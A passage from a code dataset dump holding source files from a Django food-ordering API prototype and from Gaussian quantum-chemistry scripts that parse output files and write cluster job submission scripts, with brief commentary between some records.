pedido1.id_menu.id_sucursal\n\t\t\t\tpedidos.append({'cantidad':str(pedido1.cantidad),'descripcion':str(pedido1.id_menu.descripcion),'tipo_comida':str(pedido1.id_menu.tipo_comida),'photo_menu':str(pedido1.id_menu.photo_menu),})\n\n\n\t\t\tlista_pedidos.append({'date':str(date),'hour':str(hour),'precio_total':str(precio_total),'status_orden':str(status_orden),'pedidos':pedidos,'sucursal_id':str(sucursal_id),'direccion_entrega':str(direccion_entrega),})\n\n\t\t\tprint lista_pedidos\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_pedidos))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('no data in pedido')\n\t\t\treturn Response({\"message\": \"no data in pedido\"})\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n@api_view()\ndef getUserRecommendations(request):\n\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getTopCustomer(request):\n\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getSucursales(request):\n\n\tsucursales = Sucursal.objects.filter(Q())\n\n\tif sucursales:\n\n\t\tlista_sucursales = []\n\n\t\tfor sucursal in sucursales:\n\t\t\tlista_sucursales.append({'name':sucursal.name,'phone':sucursal.phone,'addres':sucursal.addres,})\n\n\t\ttry:\n\t\t\treturn Response(json.dumps(lista_sucursales))\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\telse:\n\n\n\t\treturn Response({\"message\": \"sin sucursales\"})\n\n\n\n\n@api_view()\ndef getMenu(request):\n\ttry:\n\t\tsucursal_id = (request.GET['id_sucursal'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_sucursal is required\"})\n\n\ttry:\n\t\tsucursal = Sucursal.objects.get(Q(id_sucursal=sucursal_id))\n\texcept Exception, e:\n\t\tsucursal = \"\"\n\n\tif sucursal != \"\":\n\n\t\tmenus = Menu.objects.filter(Q(id_sucursal=sucursal))\n\n\t\tif menus:\n\n\t\t\tlista_menu = []\n\n\t\t\tfor menu in menus:\n\t\t\t\t# str() so the ForeignKey and ImageField values are JSON serializable\n\t\t\t\tlista_menu.append({'id_sucursal':str(menu.id_sucursal),'descripcion':menu.descripcion,'tipo_comida':menu.tipo_comida,'precio':menu.precio,'photo_menu':str(menu.photo_menu),})\n\n\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_menu))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('sin menu')\n\t\t\treturn Response({\"message\": \"no data in Menu\"})\n\telse:\n\t\tprint('sin menu')\n\t\treturn Response({\"message\": \"sin sucursal\"})\n\n\n\n\n\n@api_view()\ndef getSucursalInfo(request):\n\n\ttry:\n\t\tsucursal_id = (request.GET['id_sucursal'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_sucursal is required\"})\n\n\ttry:\n\t\tsucursal = Sucursal.objects.get(Q(id_sucursal=sucursal_id))\n\texcept Exception, e:\n\t\tsucursal = \"\"\n\n\tif sucursal:\n\n\t\tlista_sucursal = []\n\n\t\t\n\t\tlista_sucursal.append({'name':str(sucursal.name),'phone':str(sucursal.phone),'addres':str(sucursal.addres),})\n\n\t\ttry:\n\t\t\treturn Response(json.dumps(lista_sucursal))\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\telse:\n\n\n\t\treturn Response({\"message\": \"sin sucursal\"})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
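Every endpoint above follows the same pattern: read an id from the query string, guard the ORM lookup with try/except, and return a `json.dumps` payload. A minimal sketch of exercising one of them with Django's test client; the `/api/user_info/` path is hypothetical, since the project's urls.py is not included here.

```python
# Python 2 sketch; the URL path is an assumption (urls.py not shown).
from django.test import Client

client = Client()
response = client.get('/api/user_info/', {'id_user': 1})
print response.status_code  # 200 on success
print response.content      # the json.dumps payload built in getUserInfo
```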
{
"alpha_fraction": 0.7257525324821472,
"alphanum_fraction": 0.7257525324821472,
"avg_line_length": 13.2380952835083,
"blob_id": "232114b954b99443e0fa7949b9dc9e19a85f02af",
"content_id": "c149102bb0e800d7c5bb48f7efefd02611af7379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 598,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 42,
"path": "/README.md",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# Gourmory\n\n\nPrototype Web to Sell and Track Food\n\n## Getting Started\n\nThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.\n\n### Installing\n\n\nInstall all dependencies on the requirement.txt file\n\n\n```\npip install -r requirement.txt\n```\n\nand install Redis \n\n```\nhttps://redis.io/topics/quickstart\n```\n\n## Running the tests\n\nFirst run redis\n\n```\nredis-server\n```\n\nthen run project Django \n\n```\npython manage.py runserver\n```\n\n\n## Authors\n* **Sheymen** "
},
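Once `redis-server` and `manage.py runserver` are running, the stack can be smoke-tested against the `hello_world` view defined in the API. A sketch with `requests`; the `/api/hello/` route is an assumption, since the actual path depends on the project's urls.py.

```python
import requests

# hypothetical route for the hello_world view
r = requests.get('http://127.0.0.1:8000/api/hello/')
print(r.json())  # expected: {'message': 'Hello, world!'}
```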
{
"alpha_fraction": 0.7307570576667786,
"alphanum_fraction": 0.731073796749115,
"avg_line_length": 28.157407760620117,
"blob_id": "f7a06902b1b5a92a536692ef9d3bda55685ae891",
"content_id": "b1d005efa8e31489d9299a1af971691b8e550885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3157,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 108,
"path": "/API/admin.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.contrib import admin\n\n# Register your models here.\n\nfrom models import *\n\nclass User_infoAdmin(admin.ModelAdmin):\n\tlist_display = ('user','name','userName','email','phone','profile_picture','last_connection','reputacion',)\n\t#list_filter = ('user','username')\n\tsearch_fields = ('userName',)\n\n\nclass Menu_Admin(admin.ModelAdmin):\n\tlist_display = ('id_menu','id_sucursal','descripcion','tipo_comida','precio','photo_menu',)\n\tsearch_fields = ('precio',)\n\n\nclass Pedido_Admin(admin.ModelAdmin):\n\tlist_display = ('id_pedido','id_userInfo','id_direccion','Precio_total','Date','hour','id_statusOrden',)\n\tsearch_fields = ('Precio_total',)\n\n\nclass Vendedor_Admin(admin.ModelAdmin):\n\tlist_display = ('id_vendedor','id_user_info','status',)\n\tsearch_fields = ('status',)\n\n\nclass Direccion_Admin(admin.ModelAdmin):\n\tlist_display = ('id_direccion','direccion',)\n\tsearch_fields = ('direccion',)\n\n\nclass Listapedido_Admin(admin.ModelAdmin):\n\tlist_display = ('id_listapedido','id_menu','id_pedido','cantidad',)\n\tsearch_fields = ('cantidad',)\n\n\n\nclass Sucursal_Admin(admin.ModelAdmin):\n\tlist_display = ('id_sucursal','name','phone','addres',)\n\tsearch_fields = ('name',)\n\n\n\nclass Status_orden_Admin(admin.ModelAdmin):\n\tlist_display = ('id_statusOrden','descripcion',)\n\tsearch_fields = ('descripcion',)\n\n\n\nclass Lista_direcciones_ip_Admin(admin.ModelAdmin):\n\tlist_display = ('id_lista_direcciones_ip','id_ip_records','direccion_ip','fecha_usro',)\n\tsearch_fields = ('fecha_usro',)\n\n\nclass Payment_user_info_Admin(admin.ModelAdmin):\n\tlist_display = ('id_payment_user_info','id_user_info','current_payment','saldo',)\n\tsearch_fields = ('saldo',)\n\n\n\nclass Gustos_Admin(admin.ModelAdmin):\n\tlist_display = ('id_gustos','descripcion','categoria',)\n\tsearch_fields = ('categoria',)\n\n\nclass Ip_records_Admin(admin.ModelAdmin):\n\tlist_display = ('id_ip_records','id_user_info','ip_actual',)\n\tsearch_fields = ('ip_actual',)\n\n\nclass Lista_gustos_Admin(admin.ModelAdmin):\n\tlist_display = ('id_lista_gustos','id_userInfo','id_gustos',)\n\t\n\nclass Payment_Available_Admin(admin.ModelAdmin):\n\tlist_display = ('id_payment_Available','id_payment_userinfo','type',)\n\tsearch_fields = ('type',)\n\n\n\nclass Vendedor_favorito_Admin(admin.ModelAdmin):\n\tlist_display = ('id_vendedor_favorito','id_user_info','fecha_agregado','id_vendedor','calificacion',)\n\tsearch_fields = ('calificacion',)\n\n\n\n\n\n\n\n\nadmin.site.register(User_info,User_infoAdmin)\nadmin.site.register(Menu,Menu_Admin)\nadmin.site.register(Pedido,Pedido_Admin)\nadmin.site.register(Vendedor,Vendedor_Admin)\nadmin.site.register(Direccion,Direccion_Admin)\nadmin.site.register(Listapedido,Listapedido_Admin)\nadmin.site.register(Sucursal,Sucursal_Admin)\nadmin.site.register(Status_orden,Status_orden_Admin)\nadmin.site.register(Lista_direcciones_ip,Lista_direcciones_ip_Admin)\nadmin.site.register(Payment_user_info,Payment_user_info_Admin)\nadmin.site.register(Gustos,Gustos_Admin)\nadmin.site.register(Ip_records,Ip_records_Admin)\nadmin.site.register(Lista_gustos,Lista_gustos_Admin)\nadmin.site.register(Payment_Available,Payment_Available_Admin)\nadmin.site.register(Vendedor_favorito,Vendedor_favorito_Admin)\n\n\n\n\n\n\n\n\n"
}
] | 7 |
theavey/QM-calc-scripts | https://github.com/theavey/QM-calc-scripts | 76219c6685ef6140e024ab7c227feeef2105f5e4 | 60b06e14b2efd307d419201079bb24152ab0bd3c | c11672eb61807b46b7c0e2c030a77bc928a1733e | refs/heads/master | 2021-06-26T03:46:42.159370 | 2019-05-01T18:41:07 | 2019-05-01T18:41:07 | 35,679,810 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46087247133255005,
"alphanum_fraction": 0.465134859085083,
"avg_line_length": 49.8983039855957,
"blob_id": "f5012241777591938dae038ca5dcbc643bbcb13d",
"content_id": "8204c309e3076b165a901970531e97d689bf5de7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15015,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 295,
"path": "/gautools/out_to_list.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# Methods which are declared with non-alphanumeric characters #\n# #\n# #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015, 2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n\nimport argparse # For parsing commandline arguments\nimport glob # Allows referencing file system/file names\nimport re # RegEx package for sorting data\n\nfrom . import geomRegex\n\n\ndef outtolist(base_name: str, method: str,\n singlefile: bool = False, geometries: int = 0,\n interactive: bool = False):\n \"\"\"This function reads command line arguments (use -h for help)\n to take output from quantum chemistry calculations and put useful\n data such as energy and geometries into (a) separate file(s).\"\"\"\n\n in_name_list = glob.glob(base_name + '*out')\n num_files = len(in_name_list)\n\n in_name_list.sort() # sort files alphanumerically\n in_name_list.sort(key=len) # sort by length (because otherwise would\n # out 1,10,11,... as opposed to 1,...,9,10,...\n # if number 01,02,... They should all be the same length and the\n # second sort won't do anything.\n\n yes = ['y', 'yes', '1']\n # process in case of single file\n if singlefile:\n if num_files == 0:\n in_name_list = glob.glob(base_name)\n num_files = len(in_name_list)\n print('number of files is {}'.format(num_files))\n if num_files == 1:\n in_name = in_name_list[0]\n print('(single) file name is {}'.format(in_name))\n if num_files > 1:\n print('More than one file matched input file name.')\n if (interactive and\n input('Get energies from multiple output files?') in yes):\n singlefile = False\n else:\n raise SyntaxError('Okay, well files that matched your input '\n 'are {}'.format(in_name_list))\n # Print some stuff if not a single file. 
Note, not \"else\" because\n # I might set singlefile to false above.\n if not singlefile:\n print('base file name is {}'.format(base_name))\n print('number of files is {:,}'.format(num_files))\n # todo add energies to comment line of geoms file\n # will be difficult/require changes, but would be good, I think\n if geometries == 1:\n # todo Need to figure this out obvs!!!!!!\n raise NotImplementedError('Not able to pull out single geom yet.')\n # Collect all geometries from files for -gg (or more)\n if geometries > 1:\n geoms_out_name = base_name + '_allgeoms'\n with open(geoms_out_name, 'w') as geom_file:\n if singlefile:\n geoms = geomRegex.findallgeoms(in_name)\n for geom in geoms:\n num_atoms = len(geom)\n geom_file.write(str(num_atoms) + '\\n')\n geom_file.write('geometry from {}\\n'.format(base_name))\n for atom in geom:\n geom_file.write(atom + '\\n')\n else:\n for file_name in in_name_list:\n geoms = geomRegex.findallgeoms(file_name)\n for geom in geoms:\n num_atoms = len(geom)\n geom_file.write(str(num_atoms) + '\\n')\n geom_file.write('geometry from {}\\n'.format(base_name))\n for atom in geom:\n geom_file.write(atom + '\\n')\n\n out_name = base_name + '_energies'\n\n # Define methods I might use that change how to process file.\n methods = {'wb97xd': 'dft', 'mp2': 'mp2', 'pbe50': 'sfdft',\n 'eom-ccsd': 'sf', 'hf': 'hf', 'pbe1pbe': 'gdft',\n 'cis': 'gcis'}\n # reading more about regex, I really should use them. I could\n # define how it matches based on the method, as opposed to all\n # the If Then loops I currently have.\n # I could essentially have a dictionary of regular expressions and just\n # reference the appropriate one for the type of output it's reading.\n # Alternatively, I could just break it up into a lot of subroutines\n # that could be called depending on the type of output.\n\n i = 0\n # Initialize not knowing method used\n _method = None\n # If given as commandline argument, set with the given method\n if method is not None:\n try:\n _method = methods[method.lower()]\n except KeyError:\n print('method {} unrecognized. Going to '.format(method) +\n 'try to find method based on output file.')\n\n # Gaussian method regex:\n # finds non-whitespace characters before a / and after a\n # whitespace character. 
Requires that the input be in the form\n    # (method)/(something, normally basis set).\n    gregex = re.compile(r'\\s+\\S+/')\n    # QChem SF methods energy regex:\n    sfenergy = re.compile(r'[=:]\\s*-\\d*\\.\\d*')\n    # Gaussian DFT methods ground state energy regex:\n    # (could use sfenergy, or combine into one)\n    gdftenergy = re.compile(r'=\\s*-\\d*\\.\\d*')\n    # Gaussian TD-DFT methods excited state energies regex:\n    tdgdftenergy = re.compile(r'\\s-*\\d+\\.\\d+\\s+ev')\n    # Gaussian CIS ground state energy regex:\n    # Goes to end of the line because given in scientific notation.\n    gcisenergy = re.compile(r'eump2\\s*=\\s*-.+')\n    # todo write geometry regex\n    # todo find some way to find \"stationary point\" and process as needed\n\n    # todo add geometry getting to all this multifile stuff\n    with open(out_name, 'w') as out_file:\n        for name in in_name_list:\n            energy_list = []\n            with open(name, 'r') as in_file:\n                for line in in_file:\n                    line = line.lower().strip()\n                    if _method is None:\n                        if 'method' in line or 'exchange' in line:\n                            # make the line into a list split by spaces\n                            linelist = re.split(' +', line)\n                            # could maybe shorten these next lines with\n                            # a Try Except construction\n                            if linelist[-1] in methods:\n                                _method = methods[linelist[-1]]\n                            else:\n                                print('Unknown method {} used'.format(\n                                    linelist[-1]))\n                                print('Assuming output formatted as HF')\n                                _method = 'hf'\n                        if 'entering gaussian sys' in line:\n                            _method = 'gaugen'\n                            # Gaussian output file, method undetermined\n                        continue\n                    if _method == 'gaugen':\n                        if line.startswith('#'):\n                            gmethodmatch = gregex.search(line)\n                            # todo do this with only one regex using groups\n                            # and non-capturing groups\n                            if gmethodmatch:\n                                gmethod = re.search(r'\\w+',\n                                                    gmethodmatch.group())\n                                if gmethod:\n                                    try:\n                                        _method = methods[gmethod.group()]\n                                    except KeyError:\n                                        print('unknown Gaussian method.  ' +\n                                              'Assuming (g)dft.')\n                                        _method = 'gdft'\n                            if re.search(r'\\btd\\s*[(=]', line):\n                                _method = 'td' + _method\n                                # Note, this will cause problems if TD is\n                                # declared on a line before the\n                                # functional/method.\n                        continue\n                    if _method == 'dft':\n                        if line.startswith('total energy'):\n                            # make the line into a list split by spaces\n                            linelist = re.split(' +', line)\n                            out_file.write(linelist[-1])\n                            out_file.write('\\n')\n                        continue\n                    if _method == 'mp2':\n                        if 'total energy' in line:\n                            # make the line into a list split by spaces\n                            linelist = re.split(' +', line)\n                            out_file.write(linelist[-2])\n                            out_file.write('\\n')\n                        continue\n                    if _method == 'sf':\n                        if 'otal energy' in line:\n                            if 'basis set' in line:\n                                # Ignore HF energy\n                                continue\n                            # use RegEx to find energy in the line:\n                            match = sfenergy.search(line)\n                            energy_list.append(match.group()[2:])\n                        continue\n                    if _method == 'sfdft':\n                        if 'otal energy' in line:\n                            # use RegEx to find energy in the line:\n                            match = sfenergy.search(line)\n                            energy_list.append(match.group()[2:])\n                        continue\n                    if _method.endswith('gdft'):\n                        # Ground state energy search for (TD)DFT with Gauss\n                        if 'scf done' in line:\n                            match = gdftenergy.search(line)\n                            energy_list.append(match.group()[2:])\n                            continue\n                    # Note: these string comparisons all use equality, not\n                    # identity: 'td' + _method builds a new string object,\n                    # so an \"is\" comparison against a literal could fail\n                    # even when the characters match.\n                    if _method == 'tdgdft':\n                        if line.startswith('excited state'):\n                            match = tdgdftenergy.search(line)\n                            if match:\n                                energy_list.append(match.group()[:-3])\n                        continue\n                    if _method == 'gcis':\n                        if 'eump2' in line:\n                            match = gcisenergy.search(line)\n                            energy_list.append(match.group()[8:])\n                            continue\n                        if line.startswith('excited state'):\n                            match = tdgdftenergy.search(line)\n                            if match:\n                                energy_list.append(match.group()[:-3])\n                        continue\n            # if energy_list:\n            # Only true if not empty\n            if True:\n                # Using for now because some error blank files\n                # should still produce a line in the output, even if blank\n                out_file.write(str(energy_list) + '\\n')\n            i += 1\n            # todo save files with desired information\n\n    print(\"Opened {0} files, and wrote data to {1}\".format(i, out_name))\n    print('Files processed for {} method.'.format(_method))\n    try:\n        # will only work if geoms_out_name defined above\n        print('geometries written to {}'.format(geoms_out_name))\n    except NameError:\n        print('No geometries saved')\n    # todo write statements about files that were saved\n\n\nif __name__ == \"__main__\":\n    descrip = ('This function takes a base file name for output files and makes'\n               ' a file basename_energies that is a list of the energies from '\n               'the read output files.')\n\n    parser = argparse.ArgumentParser(description=descrip)\n    parser.add_argument('base_name', help='base name of files to read')\n    # todo use argparse to check for multiple positional arguments?\n    # If I pass it as list set it all as in_name_list?\n    parser.add_argument('-m', '--method',\n                        help=('calculation method (changes how files '\n                              'are interpreted)'))\n    parser.add_argument('-s', '--singlefile', action='store_true',\n                        help=('use if output is single file with '\n                              'multiple geometries'))\n    parser.add_argument('-g', '--geometries', action='count', default=0,\n                        help=('Flag for creating file of geometries in '\n                              'XYZ style format.'\n                              '\\n-g for stationary points, -gg for all.'))\n    # todo add option for saving all energies -e?\n    # todo add flag for gaussian vs. qchem?\n    # maybe to separate file with different name? Probably not\n    args = parser.parse_args()\n    outtolist(base_name=args.base_name, method=args.method,\n              singlefile=args.singlefile, geometries=args.geometries,\n              interactive=True)\n"
},
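`outtolist` doubles as the module's command-line entry point, and it can be called the same way from Python. A sketch, assuming Gaussian output files named `myjob1.out`, `myjob2.out`, ... exist in the working directory:

```python
from gautools.out_to_list import outtolist

# Scans myjob*out and writes the energies to 'myjob_energies';
# geometries=2 (the CLI's -gg) also writes every geometry found
# to 'myjob_allgeoms'.
outtolist(base_name='myjob', method='wb97xd',
          singlefile=False, geometries=2)
```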
{
"alpha_fraction": 0.5301768779754639,
"alphanum_fraction": 0.535067617893219,
"avg_line_length": 43.49074172973633,
"blob_id": "0be7c7870f23a10b36fb7417d0934c5beb6e96b6",
"content_id": "16adc3c8486e2f9e557cbef70e8a437e66aeb740",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19220,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 432,
"path": "/gautools/submit_gaussian.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# This is written to work with python 3 because it should be good to\n# be working on the newest version of python.\nfrom __future__ import print_function\n\nimport argparse # For parsing commandline arguments\nimport datetime\nimport glob # Allows referencing file system/file names\nimport os\nimport re\nimport readline # Allows easier file input (with tab completion?)\nimport subprocess # Allows for submitting commands to the shell\nfrom warnings import warn\nfrom thtools import cd, make_obj_dir, save_obj, resolve_path\n\nyes = ['y', 'yes', '1']\n\n\n# An input function that can prefill in the text entry\n# Not sure if this works in 3.5+ because raw_input is gone\ndef rlinput(prompt, prefill=''):\n readline.set_startup_hook(lambda: readline.insert_text(prefill))\n try:\n return input(prompt)\n finally:\n readline.set_startup_hook()\n\n\ndef _dir_and_file(path):\n warn('_dir_and_file is deprecated. 
Use os.path.split instead',\n DeprecationWarning)\n if '/' in path:\n rel_dir, f_name = path.rsplit('/', 1)\n rel_dir = rel_dir + '/'\n else:\n rel_dir = ''\n f_name = path\n return rel_dir, f_name\n\n\ndef create_gau_input(coord_name, template, verbose=True):\n \"\"\"\n make gaussian input file by combining header and coordinates files\n\n This function takes as input a file with a set of molecular\n coordinates (the form should not matter, it will just be copied\n into the next file) and a template file that should be the header\n for the desired calculation (including charge and multiplicity),\n returns the name of the file, and creates a Gaussian input file ending\n with '.com'\n\n :param str coord_name: name of file with coordinates in a format\n Gaussian can read\n :param str template: name of file with header for Gaussian calculation\n (up to and including the charge and multiplicity)\n :param bool verbose: If True, some status messages will be printed\n (including file names)\n :return: name of the written file\n :rtype: str\n \"\"\"\n if verbose:\n print('Creating Gaussian input file...')\n _out_name = coord_name.rsplit('.', 1)[0] + '.com'\n with open(_out_name, 'w') as out_file:\n with open(template, 'r') as templ_file:\n if verbose:\n print('opened {}'.format(template))\n for line in templ_file:\n out_file.write(line)\n if '\\n' not in line:\n out_file.write('\\n')\n with open(coord_name, 'r') as in_file:\n if verbose:\n print('opened {}'.format(coord_name))\n for i, line in enumerate(in_file):\n if i < 2:\n # ignore first two lines\n # number of atoms and the title/comment\n continue\n # if line.strip().isdigit():\n # # the first line is the number of atoms\n # continue\n # # XYZ files created by mathematica have a comment\n # # as the second line saying something like:\n # # \"Created by mathematica\". Obv. want to ignore that\n # if line.strip().startswith('Create') or\n # line.strip().startswith('generated'):\n # continue\n # else:\n out_file.write(line)\n out_file.write('\\n\\n\\n')\n if verbose:\n print('created Gaussian input file {}'.format(_out_name))\n return _out_name\n\n\ndef get_input_files(base_name, batch):\n _in_name_list = glob.glob(base_name + '*')\n _in_name_list.sort() # sort files alphanumerically\n _in_name_list.sort(key=len) # sort by length (because otherwise would\n # put 1,10,11,... as opposed to 1,...,9,10,...\n # if number 01,02,... They should all be the same length and the\n # second sort won't do anything.\n if not batch:\n num_files = len(_in_name_list)\n if num_files > 1:\n print('Multiple files starting with {}'.format(base_name))\n if input('Did you mean to execute a batch job? 
') in yes:\n            batch = True\n        else:\n            print('What file name shall I use?')\n            _in_name_list = [rlinput('file name: ', base_name)]\n    return _in_name_list, batch\n\n\ndef use_template(template, in_names, verbose):\n    made_name_list = []\n    for in_name in in_names:\n        out_name = create_gau_input(in_name, template, verbose=verbose)\n        made_name_list.append(out_name)\n        if verbose:\n            print('Added {} to files to possibly submit.'.format(out_name))\n    _in_name_list = made_name_list\n    _in_name_list.sort()\n    _in_name_list.sort(key=len)\n    return _in_name_list\n\n\ndef write_sub_script(input_name, num_cores=16, time='12:00:00', verbose=False,\n                     mem='125', executable='g09',\n                     chk_file=None, copy_chk=False,\n                     ln_running=None,\n                     hold_jid=None, xyz=None, make_xyz=None, make_input=False,\n                     ugt_dict=None):\n    \"\"\"\n    Write submission script for (Gaussian) jobs for submission to queue\n\n    If make_xyz is not None, the file make_xyz will be checked to exist\n    first to make sure to not waste time when missing a necessary input file.\n\n    :param str input_name: Name of the file to use as input\n    :param int num_cores: Number of cores to request\n    :param str time: Amount of time to request in the format 'hh:mm:ss'\n    :param bool verbose: If True, print out some status messages and such\n    :type mem: int or str\n    :param mem: Minimum amount of memory to request\n    :param str executable: Executable file to use for the job\n\n        Example, 'g09', 'g16'\n\n    :param str chk_file: If not None, this file will be copied back after the\n        job has completed. If this is not None and make_input is True,\n        this will also be passed to use_gen_template.\n    :param bool copy_chk: If this is True, the script will attempt to copy\n        what should be an existing checkpoint file to the scratch directory\n        before running the job. `chk_file` must be not None as well.\n    :param str ln_running: If not None, this will be the base name for\n        linking the output file to the current directory. If chk_file is not\n        None, it will also be linked with the same base name.\n    :param str hold_jid: Job on which this job should depend.\n        This should be the name of another job in the queuing system.\n    :param str xyz: Name of an xyz file to use as input to use_gen_template\n        (if make_input is True).\n    :param str make_xyz: The name of a file to pass to obabel to be used to\n        create an xyz file to pass to use_gen_template.\n    :param bool make_input: If True, use_gen_template will be used to create\n        input for the Gaussian calculation.\n    :param dict ugt_dict: dict of arguments to pass to use_gen_template.\n\n        This should not include out_file, xyz, nproc, mem, or checkpoint\n        because those will all be used from other arguments to this function.\n        out_file will be input_name; xyz will be xyz or a time-based name if\n        make_xyz is not None; nproc will be $NSLOTS (useful if this gets\n        changed after job submission); mem will be mem; and checkpoint will\n        be chk_file.\n    :return: The name of the script file\n    :rtype: str\n    \"\"\"\n    rel_dir, file_name = os.path.split(input_name)\n    if file_name.endswith('.com'):\n        short_name = os.path.splitext(file_name)[0]\n        if not short_name + '.com' == file_name:\n            raise SyntaxError('problem interpreting file name. ' +\n                              'Period in file name?')\n        out_name = short_name + '.out'\n    elif '.' in file_name:\n        short_name, input_extension = os.path.splitext(file_name)\n        # os.path.splitext keeps the leading dot in the extension\n        if not short_name + input_extension == file_name:\n            raise SyntaxError('problem interpreting file name. 
' +\n 'Period in file name?')\n out_name = short_name + '.out'\n else:\n short_name = file_name\n file_name = short_name + '.com'\n print('Assuming input file is {}'.format(file_name))\n out_name = short_name + '.out'\n job_name = re.match(r'.*?([a-zA-Z].*)', short_name).group(1)\n if len(job_name) == 0:\n job_name = 'default'\n _script_name = os.path.join(rel_dir, 'submit'+short_name+'.sh')\n temp_xyz = os.path.abspath('.temp' +\n datetime.datetime.now().strftime('%H%M%S%f') +\n '.xyz')\n if xyz is None or make_xyz is not None:\n n_xyz = temp_xyz\n else:\n n_xyz = resolve_path(xyz)\n temp_pkl = temp_xyz[:-4]\n if ugt_dict is not None:\n make_obj_dir()\n pkl_path = save_obj(ugt_dict, temp_pkl)\n if chk_file is not None:\n chk_line = 'checkpoint=\\'{}\\','.format(chk_file)\n else:\n chk_line = ''\n\n with open(_script_name, 'w') as script_file:\n sfw = script_file.write\n sfw('#!/bin/bash -l\\n\\n')\n sfw('#$ -pe omp {}\\n'.format(num_cores))\n sfw('#$ -M [email protected]\\n')\n sfw('#$ -m eas\\n')\n sfw('#$ -l h_rt={}\\n'.format(time))\n sfw('#$ -l mem_total={}G\\n'.format(mem))\n sfw('#$ -N {}\\n'.format(job_name))\n sfw('#$ -j y\\n')\n sfw('#$ -o {}.log\\n\\n'.format(short_name))\n if hold_jid is not None:\n sfw('#$ -hold_jid {}\\n\\n'.format(hold_jid))\n if make_xyz is not None:\n sfw('if [ ! -f {} ]; then\\n'.format(\n os.path.abspath(make_xyz)) +\n ' exit 17\\n'\n 'fi\\n\\n')\n sfw('module load wxwidgets/3.0.2\\n')\n sfw('module load openbabel/2.4.1\\n\\n')\n sfw('obabel {} -O {}\\n\\n'.format(os.path.abspath(\n make_xyz), os.path.abspath(n_xyz)))\n if make_input:\n sfw('python -c \"from gautools.tools import '\n 'use_gen_template as ugt;\\n'\n 'from thtools import load_obj, get_node_mem;\\n'\n 'm = get_node_mem();\\n'\n 'd = load_obj(\\'{}\\');\\n'.format(\n os.path.abspath(pkl_path)) +\n 'ugt(\\'{}\\',\\'{}\\','.format(\n file_name, os.path.abspath(n_xyz)) +\n 'nproc=$NSLOTS,mem=m,{}'.format(chk_line) +\n '**d)\"\\n\\n')\n sfw('INPUTFILE={}\\n'.format(file_name))\n sfw('OUTPUTFILE={}\\n'.format(out_name))\n if chk_file is not None:\n sfw('CHECKFILE={}\\n\\n'.format(chk_file))\n else:\n sfw('\\n')\n if ln_running is not None:\n sfw('WORKINGOUT={}.out\\n'.format(ln_running))\n if chk_file is not None:\n sfw('WORKINGCHK={}.chk\\n\\n'.format(ln_running))\n else:\n sfw('\\n')\n sfw('CURRENTDIR=`pwd`\\n')\n sfw('SCRATCHDIR=/scratch/$USER\\n')\n sfw('mkdir -p $SCRATCHDIR\\n\\n')\n sfw('cd $SCRATCHDIR\\n\\n')\n sfw('cp $CURRENTDIR/$INPUTFILE .\\n')\n if chk_file is not None:\n sfw('# ') if not copy_chk else None\n sfw('cp $CURRENTDIR/$CHECKFILE .\\n\\n')\n else:\n sfw('\\n')\n if ln_running is not None:\n sfw('ln -s -b /net/`hostname -s`$PWD/$OUTPUTFILE '\n '$CURRENTDIR/$WORKINGOUT\\n')\n if chk_file is not None:\n sfw('ln -s -b /net/`hostname -s`$PWD/$CHECKFILE '\n '$CURRENTDIR/$WORKINGCHK\\n\\n')\n 